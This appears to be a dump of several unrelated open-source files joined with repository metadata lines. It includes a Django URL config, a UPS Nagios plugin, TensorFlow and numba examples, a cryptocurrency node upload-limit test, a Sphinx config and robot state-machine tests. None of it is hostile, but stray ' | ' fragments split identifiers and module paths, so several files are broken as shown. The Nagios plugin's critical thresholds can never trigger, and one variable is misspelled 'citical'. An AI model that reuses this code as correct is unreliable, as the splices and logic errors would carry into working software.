# Afficher les dix nom | bres su | ivants la valeur N donnée en paramètre
def show_num(a):
    """Print *a* and the nine integers that follow it, concatenated with no
    separator (matching the original output format)."""
    for value in range(a, a + 10):
        print(value, end='')
# Read the starting value from the user, then display the run of numbers.
print('Donne moi une valeur : ', end='')
a = int(input())
show_num(a)
|
okin006/tracker | tracker/urls.py | Python | mit | 811 | 0 | """tracker URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contri | b import admin
# Route /admin/ to the Django admin site and /ticket/ to the ticket app's
# own URLconf.
urlpatterns = [
    url(r'^admin/', include(admin.site.urls)),
    url(r'^ticket/', include('tracker.ticket.urls')),
]
|
eXk0n/nagios-plugins | apcupsd-nagios.py | Python | mit | 1,574 | 0.021601 | #!/usr/bin/env python
import subprocess
import sys
warning = False
critical = False
load = subprocess.check_output("/usr/sbin/apcaccess -p LOADPCT -u", shell=True).rstrip()
bcharge = subprocess.check_output("/usr/sbin/apcaccess -p BCHARGE -u", shell=True).rstrip()
timeleft = subprocess.check_output("/usr/sbin/apcaccess -p TIMELEFT -u", shell=True).rstrip()
linev = subprocess.check_output("/usr/sbin/a | pcaccess -p LINEV -u", shell=True).rstrip()
battv = subprocess.check_output("/usr/sbin/apcaccess -p BATTV -u", shell=True).rstrip( | )
if float(load) > 70.0:
warning = True
elif float(load) > 90.0:
citical = True
if float(linev) > 240.0:
warning = True
elif float(linev) > 250.0:
critical = True
if float(linev) < 210.0:
warning = True
elif float(linev) < 200.0:
critical = True
if float(battv) > 28.0:
warning = True
elif float(battv) > 29.0:
critical = True
if float(battv) < 11.0:
warning = True
elif float(battv) < 10.0:
critical = True
if float(timeleft) < 10.0:
warning = True
elif float(timeleft) < 5.0:
critical = True
if float(bcharge) < 50.0:
warning = True
elif float(bcharge) < 20.0:
critical = True
if warning == True:
print "WARNING - check ups values! |",
elif critical == True:
print "CRITICAL - check ups values! |",
else:
print "Ok - ups looks good |",
print "battery-load=" + str(load) + ";" , "battery-charge=" + str(bcharge) + ";" , "timeleft=" + str(timeleft) + ";" , "linevolt=" + str(linev) + ";" , "batteryvolt=" + str(battv) + ";"
if warning == True:
sys.exit(1)
elif critical == True:
sys.exit(2)
else:
sys.exit(0)
|
tensorflow/privacy | tensorflow_privacy/privacy/optimizers/dp_optimizer_keras_test.py | Python | apache-2.0 | 19,265 | 0.003426 | # Copyright 2019, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from tensorflow_privacy.privacy.optimizers import dp_optimizer_keras
from tensorflow_privacy.privacy.optimizers import dp_optimizer_keras_vectorized
class DPOptimizerComputeGradientsTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for _compute_gradients method."""
def _loss(self, val0, val1):
"""Loss function whose derivative w.r.t val1 is val1 - val0."""
return 0.5 * tf.reduce_sum(
input_tensor=tf.math.squared_difference(val0, val1), axis=1)
# Parameters for testing: optimizer, num_microbatches, expected gradient for
# var0, expected gradient for var1.
@parameterized.named_parameters(
('DPGradientDescent 1', dp_optimizer_keras.DPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdam 2', dp_optimizer_keras.DPKerasAdamOptimizer, 2, [-2.5, -2.5
], [-0.5]),
('DPAdagrad 4', dp_optimizer_keras.DPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPGradientDescentVectorized 1',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdamVectorized 2',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdamOptimizer, 2,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized 4',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized None',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, None,
[-2.5, -2.5], [-0.5]),
)
def testBaselineWithCallableLoss(self, cls, num_microbatches, expected_grad0,
expected_grad1):
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0])
data0 = tf.Variable([[3.0, 4.0], [5.0, 6.0], [7.0, 8.0], [-1.0, 0.0]])
data1 = tf.Variable([[8.0], [2.0], [3.0], [1.0]])
opt = cls(
l2_norm_clip=100.0,
noise_multiplier=0.0,
num_microbatches=num_microbatches,
learning_rate=2.0)
loss = lambda: self._loss(data0, var0) + self._loss(data1, var1)
grads_and_vars = opt._compute_gradients(loss, [var0, var1])
self.assertAllCloseAccordingToType(expected_grad0, grads_and_vars[0][0])
self.assertAllCloseAccordingToType(expected_grad1, grads_and_vars[1][0])
# Parameters for testing: optimizer, num_microbatches, expected gradient for
# var0, expected gradient for var1.
@parameterized.named_parameters(
('DPGradientDescent 1', dp_optimizer_keras.DPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdam 2', dp_optimizer_keras.DPKerasAdamOptimizer, 2, [-2.5, -2.5
], [-0.5]),
('DPAdagrad 4', dp_optimizer_keras.DPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPGradientDescentVectorized 1',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdamVectorized 2',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdamOptimizer, 2,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized 4',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized None',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, None,
[-2.5, -2.5], [-0.5]),
)
def testBaselineWithTensorLoss(self, cls, num_microbatches, expected_grad0,
expected_grad1):
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0])
data0 = tf.Variable([[3.0, 4.0], [5.0, 6.0], [7.0, 8.0], [-1.0, 0.0]])
data1 = tf.Variable([[8.0], [2.0], [3.0], [1.0]])
opt = cls(
l2_norm_clip=100.0,
noise_multiplier=0.0,
num_microbatches=num_microbatches,
learning_rate=2.0)
tape = tf.GradientTape()
with tape:
loss = self._loss(data0, var0) + self._loss(data1, var1)
grads_and_vars = opt._compute_gradients(loss, [var0, var1], tape=tape)
self.assertAllCloseAccordingToType(expected_grad0, grads_and_vars[0][0])
self.assertAllCloseAccordingToType(expected_grad1, grads_and_vars[1][0])
@parameterized.named_parameters(
('DPGradientDescent', dp_optimizer_keras.DPKerasSGDOptimizer),
('DPGradientDescentVectorized',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer),
)
def testClippingNorm(self, cls):
var0 = tf.Variable([0.0, 0.0])
data0 = tf.Variable([[3.0, 4.0], [6.0, 8.0]])
opt = cls(
l2_norm_clip=1.0,
noise_multiplier=0.0,
num_microbatches=1,
learning_rate=2.0)
loss = lambda: self._loss(data0, var0)
# Expected gradient is sum of differences.
grads_and_vars = opt._compute_gradients(loss, [var0])
self.assertAllCloseAccordingToType([-0.6, -0.8], grads_and_vars[0][0])
@parameterized.named_parameters(
('DPGradientDescent 2 4 1', dp_optimizer_keras.DPKerasSGDOptimizer, 2.0,
4.0, 1),
('DPGradientDescent 4 1 4', dp_optimizer_keras.DPKerasSGDOptimizer, 4.0,
1.0, 4),
('DPGradientDescentVectorized 2 4 1',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 2.0, 4.0,
1),
('DPGradientDescentVectorized 4 1 4',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 4.0, 1.0,
4),
)
def testNoiseMultiplier(self, cls, l2_norm_clip, noise_multiplier,
num_microbatches):
var0 = tf.Variable(tf.zeros([1000], dtype=tf.float32))
data0 = tf.Variable(tf.zeros([16, 1000], dtype=tf.float32))
opt = cls(
l2_norm_clip=l2_norm_clip,
noise_multiplier=noise_multiplier,
num_microbatches=num_microbatches,
learning_rate=2.0)
loss = lambda: self._loss(data0, var0)
grads_and_vars = opt._compute_gradients(loss, [var0])
grads = grads_and_vars[0][0].numpy()
# Test standard deviation is close to l2_norm_clip * noise_multiplier.
self.assertNear(
np.std(grads), l2_norm_clip * noise_multiplier / num_microbatches, 0.5)
@parameterized.named_parameters(
('DPGradientDescent', dp_optimizer_keras.DPKerasSGDOptimizer),
('DPAdagrad', dp_optimizer_keras.DPKerasAdagradOptimizer),
('DPAdam', dp_optimizer_keras.DPKerasAdamOptimizer),
('DPGradientDescentVectorized',
dp_optimizer_keras_vectori | zed.VectorizedDPKerasSGDOptimizer),
( | 'DPAdagradVectorized',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer),
('DPAdamVectorized',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdamOptimizer),
)
def testAssertOnNoCallOfComputeGradients(self, cls):
"""Tests that assertion fails when DP gradients are not computed."""
opt = cls(
l2_norm_clip=100.0,
noise_multiplier=0.0,
num_microbatches=1,
learning_rate=2.0)
with self.assertRaises(AssertionError):
grads_and_vars = tf.Variable([0.0])
opt.apply_gradients(grads_and_vars)
# Expect no exception if _compute_gradients is called.
var0 = tf.Variable([0.0])
data0 = tf.Variable([[0.0]])
loss = lambda: self._loss(data0, var0)
grads_and_vars = opt._compute_gradients(loss, [var0])
opt.apply_gradients(grads_and_vars)
class DPOptimizerGetGradientsTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for get_gradient method.
Since get_gradients must run in graph mode, the method is tested within
the Estimator framework.
"""
def _make_linear_model_fn( |
jriehl/numba | examples/kernel-density-estimation/kernel_density_estimation.py | Python | bsd-2-clause | 1,135 | 0.003524 | #
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
from numba import njit, prange
import numpy as np
import argparse
import time
def kde(X):
    """Return the summed log-density of the samples in X under a Gaussian
    kernel model with three fixed centres (-1, 2, 5) and bandwidth 0.5,
    using a shifted log-sum-exp per sample."""
    bandwidth = 0.5
    centres = np.array([-1.0, 2.0, 5.0])
    n_centres = centres.shape[0]
    total = 0
    # "prange" in a normal function is identical to "range"
    for idx in prange(X.shape[0]):
        sample = X[idx]
        log_kernels = (-(sample - centres) ** 2) / (2 * bandwidth ** 2)
        shift = np.min(log_kernels)
        total += shift - np.log(bandwidth * n_centres) + np.log(np.sum(np.exp(log_kernels - shift)))
    return total
def main():
parser = argparse.ArgumentParser(description='Kernel-Density')
parser.add_argument('--size', dest='size', type=int, default=10000000)
parser.add_argument('--iterations', dest='iterations', type=int, default=20)
args = parser.parse_args()
size = args.siz | e
iterations = args.iterations
np.random.seed(0)
kde(np.random.ranf(10))
print("size:", size)
X = np.random.ranf(size)
t1 = time.time()
for _ in range(iterations):
res = kde(X)
t = time.time()-t1
print("checksum:", res)
print("SELFTIMED:", t)
if __name__ == '__main__':
main()
|
AdnCoin/AdnCoin | qa/rpc-tests/maxuploadtarget.py | Python | mit | 10,732 | 0.003075 | #!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
'''
Test behavior of -maxuploadtarget.
* Verify that getdata requests for old blocks (>1week) are dropped
if uploadtarget has been reached.
* Verify that getdata requests for recent blocks are respecteved even
if uploadtarget has been reached.
* Verify that the upload counters are reset after 24 hours.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
self.block_receive_map = {}
def add_connection(self, conn):
self.connection = conn
self.peer_disconnected = False
def on_inv(self, conn, message):
pass
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
def on_block(self, conn, message):
message.block.calc_sha256()
try:
self.block_receive_map[message.block.sha256] += 1
except KeyError as e:
self.block_receive_map[message.block.sha256] = 1
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
def veracked():
return self.verack_received
return wait_until(veracked, timeout=10)
def wait_for_disconnect(self):
def disconnected():
return self.peer_disconnected
return wait_until(disconnected, timeout=10)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
def on_close(self, conn):
self.peer_disconnected = True
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.connection.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout)
self.ping_counter += 1
return success
class MaxUploadTest(BitcoinTestFramework):
def __init__(self):
self.utxo = []
self.txouts = gen_return_txouts()
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("ADND", "adnd"),
help="adnd binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Start a node with maxuploadtarget of 200 MB (/24h)
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-maxuploadtarget=200", "-blockmaxsize=999000"]))
def mine_full_block(self, node, address):
# Want to create a full block
# We'll generate a 66k transaction below, and 14 of them is close to the 1MB block limit
for j in xrange(14):
if len(self.utxo) < 14:
self.utxo = node.listunspent()
inputs=[]
outputs = {}
t = self.utxo.pop()
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
remchange = t["amount"] - Decimal("0.001000")
outputs[address]=remchange
# Create a basic transaction that will send change back to ourself after account for a fee
# And then insert the 128 generated transaction outs in the middle rawtx[92] is where the #
# of txouts is stored and is the only thing we overwrite from the original transaction
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + self.txouts
newtx = newtx + rawtx[94:]
# Appears to be ever so slightly faster to sign with SIGHASH_NONE
signresult = node.signrawtransaction(newtx,None,None,"NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
# Mine a full sized block which will be these transactions we just created
node.generate(1)
def run_test(self):
# Before we connect anything, we first set the time on the node
# to be in the past, otherwise things break because the CNode
# time counters can't be reset backward after initialization
old_time = int(time.time() - 2*60*60*24*7)
self.nodes[0].setmocktime(old_time)
# Generate some old blocks
self.nodes[0].generate(130)
# test_nodes[0] will only request old blocks
# test_nodes[1] will only r | equest new blocks
# test_nodes[2] will test resetting the counte | rs
test_nodes = []
connections = []
for i in xrange(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
# Test logic begins here
# Now mine a big block
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# Store the hash; we'll request this later
big_old_block = self.nodes[0].getbestblockhash()
old_block_size = self.nodes[0].getblock(big_old_block, True)['size']
big_old_block = int(big_old_block, 16)
# Advance to two days ago
self.nodes[0].setmocktime(int(time.time()) - 2*60*60*24)
# Mine one more block, so that the prior block looks old
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# We'll be requesting this new block too
big_new_block = self.nodes[0].getbestblockhash()
new_block_size = self.nodes[0].getblock(big_new_block)['size']
big_new_block = int(big_new_block, 16)
# test_nodes[0] will test what happens if we just keep requesting the
# the same big old block too many times (expect: disconnect)
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, big_old_block))
max_bytes_per_day = 200*1024*1024
daily_buffer = 144 * MAX_BLOCK_SIZE
max_bytes_available = max_bytes_per_day - daily_buffer
success_count = max_bytes_available // old_block_size
# 144MB will be reserved for relaying new blocks, so expect this to
# succeed for ~70 tries.
for i in xrange(success_count):
test_nodes[0].send_message(getdata_request)
test_nodes[0].sync_with_ping()
assert_equal(test_nodes[0].block_receive_map[big_old_block], i+1)
assert_equal(len(self.nodes[0].getpeerinfo()), 3)
# At most a couple more tries should succeed (depending on how long
# the test has been running so far).
for i in xrange(3):
test_nodes[0].send_message(getdata_request)
test_nodes[0].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 2)
print "Peer 0 disconnected after downloading old block too many times"
# Requesting the current block on test_nodes[1] should succeed indefinitely,
# even when over the max upload target.
# We'll try 200 times
getdata_request.inv = [CInv(2, big_new_block)]
for i in xrange(200):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1 |
JasonHanG/tensor-gallery | basic-operation/linear_regression.py | Python | apache-2.0 | 1,901 | 0.002104 | import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import xlrd
DATA_FILE = 'data/fire_theft.xls'
# Step 1: read in data from the .xls file
book = xlrd.open_workbook(DATA_FILE, encoding_override="utf-8")
sheet = book.sheet_by_index(0)
data = np.asarray([sheet.row_values(i) for | i in range(1, sheet.nrows)])
n_samples = sheet.nrows - 1
# Step 2: create placeholders for input X (number of fire) and l | abel Y (number of theft)
X = tf.placeholder(tf.float32, name='X')
Y = tf.placeholder(tf.float32, name='Y')
# Step 3: create weight and bias, initialized to 0
w = tf.Variable(0.0, name='weights')
b = tf.Variable(0.0, name='bias')
# Step 4: build model to predict Y
Y_predicted = X * w + b
# Step 5: use the square error as the loss function
loss = tf.square(Y - Y_predicted, name='loss')
# loss = utils.huber_loss(Y, Y_predicted)
# Step 6: using gradient descent with learning rate of 0.01 to minimize loss
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)
with tf.Session() as sess:
# Step 7: initialize the necessary variables, in this case, w and b
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter('./graphs/linear_reg', sess.graph)
# Step 8: train the model
for i in range(50): # train the model 100 epochs
total_loss = 0
for x, y in data:
# Session runs train_op and fetch values of loss
_, l = sess.run([optimizer, loss], feed_dict={X: x, Y: y})
total_loss += l
print('Epoch {0}: {1}'.format(i, total_loss / n_samples))
# close the writer when you're done using it
writer.close()
# Step 9: output the values of w and b
w, b = sess.run([w, b])
# plot the results
X, Y = data.T[0], data.T[1]
plt.plot(X, Y, 'bo', label='Real data')
plt.plot(X, X * w + b, 'r', label='Predicted data')
plt.legend()
plt.show() |
jdl-mit-alum/code-quality | python_2_7/Search/docs/conf.py | Python | gpl-3.0 | 8,441 | 0.005331 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# parlogser documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import parlogser
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'parlogser'
copyright = u'2016, Jonathan D. Lettvin'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = parlogser.__version__
# The full version, including alpha/beta/rc tags.
release = parlogser.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built
# documents.
#keep_warnings = False
# -- Options for HTML output -------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a
# theme further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as
# html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the
# | top of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon
# of the docs. This file should be a Windows icon file (.ico) being
# 16x16 or 32x32 pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets)
# here, relative to this directory. They are | copied after the builtin
# static files, so a file named "default.css" will overwrite the builtin
# "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page
# bottom, using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names
# to template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer.
# Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer.
# Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages
# will contain a <link> tag referring to it. The value of this option
# must be the base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'parlogserdoc'
# -- Options for LaTeX output ------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'parlogser.tex',
u'parlogser Documentation',
u'Jonathan D. Lettvin', 'manual'),
]
# The name of an image file (relative to this directory) to place at
# the top of the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings
# are parts, not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'parlogser',
u'parlogser Documentation',
[u'Jonathan D. Lettvin'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ----------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'parlogser',
u'parlogser Documentation',
u'Jonathan D. Lettvin',
'parlogser',
'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If fa |
robotpy/robotpy-wpilib-utilities | tests/test_magicbot_sm.py | Python | bsd-3-clause | 13,059 | 0.003293 | from magicbot.state_machine import (
default_state,
state,
timed_state,
AutonomousStateMachine,
StateMachine,
IllegalCallError,
NoFirstStateError,
MultipleFirstStatesError,
MultipleDefaultStatesError,
InvalidStateName,
)
from magicbot.magic_tunable import setup_tunables
import pytest
def test_no_timed_state_duration():
with pytest.raises(TypeError):
class _TM(StateMachine):
@timed_state()
def tmp(self):
pass
def test_no_start_state():
class _TM(StateMachine):
pass
with pytest.raises(NoFirstStateError):
_TM()
def test_multiple_first_states():
class _TM(StateMachine):
@state(first=True)
def tmp1(self):
pass
@state(first=True)
def tmp2(self):
pass
with pytest.raises(MultipleFirstStatesError):
_TM()
def test_sm(wpitime):
class _TM(StateMachine):
def __init__(self):
self.executed = []
def some_fn(self):
self.executed.append("sf")
@state(first=True)
def first_state(self):
self.executed.append(1)
self.next_state("second_state")
@timed_state(duration=1, next_state="third_state")
def second_state(self):
self.executed.append(2)
@state
def third_state(self):
self.executed.append(3)
sm = _TM()
setup_tunables(sm, "cname")
sm.some_fn()
# should not be able to directly call
with pytest.raises(IllegalCallError):
sm.first_state()
assert sm.current_state == ""
assert not sm.is_executing
sm.engage()
assert sm.current_state == "first_state"
assert not sm.is_executing
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
# should not change
sm.engage()
assert sm.current_state == "second_state"
assert sm.is_executing
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
wpitime.step(1.5)
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
# should be done
sm.done()
assert sm.current_state == ""
assert not sm.is_executing
# should be able to start directly at second state
sm.engage(initial_state="second_state")
sm.execute()
assert sm.current_state == "second_state"
assert sm.is_executing
wpitime.step(1.5)
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
# test force
sm.engage()
sm.execute()
assert sm.current_state == "third_state"
assert sm.is_executing
sm.engage(force=True)
assert sm.current_state == "first_state"
assert sm.is_executing
sm.execute()
sm.execute()
assert not sm.is_executing
assert sm.current_state == ""
assert sm.executed == ["sf", 1, 2, 3, 3, 2, 3, 3, 1]
def test_sm_inheritance():
class _TM1(StateMachine):
@state
def second_state(self):
self.done()
class _TM2(_TM1):
@state(first=True)
def first_state(self):
self.next_state("second_state")
sm = _TM2()
setup_tunables(sm, "cname")
sm.engage()
assert sm.current_state == "first_state"
sm.execute()
assert sm.current_state == "second_state"
sm.execute()
assert sm.current_state == ""
def test_must_finish(wpitime):
class _TM(StateMachine):
def __init__(self):
self.executed = []
@state(first=True)
def ordinary1(self):
self.next_state("ordinary2")
self.executed.append(1)
@state
def ordinary2(self):
self.next_state("must_finish")
self.executed.append(2)
@state(must_finish=True)
def must_finish(self):
self.executed.append("mf")
@state
def ordinary3(self):
self.executed.append(3)
self.next_state_now("timed_must_finish")
@timed_state(duration=1, must_finish=True)
def timed_must_finish(self):
self.executed.append("tmf")
sm = _TM()
setup_tunables(sm, "cname")
sm.engage()
sm.execute()
sm.execute()
| assert sm.current_state == ""
assert not sm.is_executing
sm.engage()
sm.execute()
sm.engage()
sm.execute()
sm.execute()
sm.execute()
assert sm.current_state == "must_finish"
assert sm.is_executing
sm.next_state("ordinary3")
sm.engage( | )
sm.execute()
assert sm.current_state == "timed_must_finish"
sm.execute()
assert sm.is_executing
assert sm.current_state == "timed_must_finish"
for _ in range(7):
wpitime.step(0.1)
sm.execute()
assert sm.is_executing
assert sm.current_state == "timed_must_finish"
wpitime.step(1)
sm.execute()
assert not sm.is_executing
assert sm.executed == [1, 1, 2, "mf", "mf", 3] + ["tmf"] * 9
def test_autonomous_sm():
class _TM(AutonomousStateMachine):
i = 0
VERBOSE_LOGGING = False
@state(first=True)
def something(self):
self.i += 1
if self.i == 6:
self.done()
sm = _TM()
setup_tunables(sm, "cname")
sm.on_enable()
for _ in range(5):
sm.on_iteration(None)
assert sm.is_executing
sm.on_iteration(None)
assert not sm.is_executing
for _ in range(5):
sm.on_iteration(None)
assert not sm.is_executing
assert sm.i == 6
def test_autonomous_sm_end_timed_state(wpitime):
class _TM(AutonomousStateMachine):
i = 0
j = 0
VERBOSE_LOGGING = False
@state(first=True)
def something(self):
self.i += 1
if self.i == 3:
self.next_state("timed")
@timed_state(duration=1)
def timed(self):
self.j += 1
sm = _TM()
setup_tunables(sm, "cname")
sm.on_enable()
for _ in range(5):
wpitime.step(0.7)
sm.on_iteration(None)
assert sm.is_executing
for _ in range(5):
wpitime.step(0.7)
sm.on_iteration(None)
assert not sm.is_executing
assert sm.i == 3
assert sm.j == 2
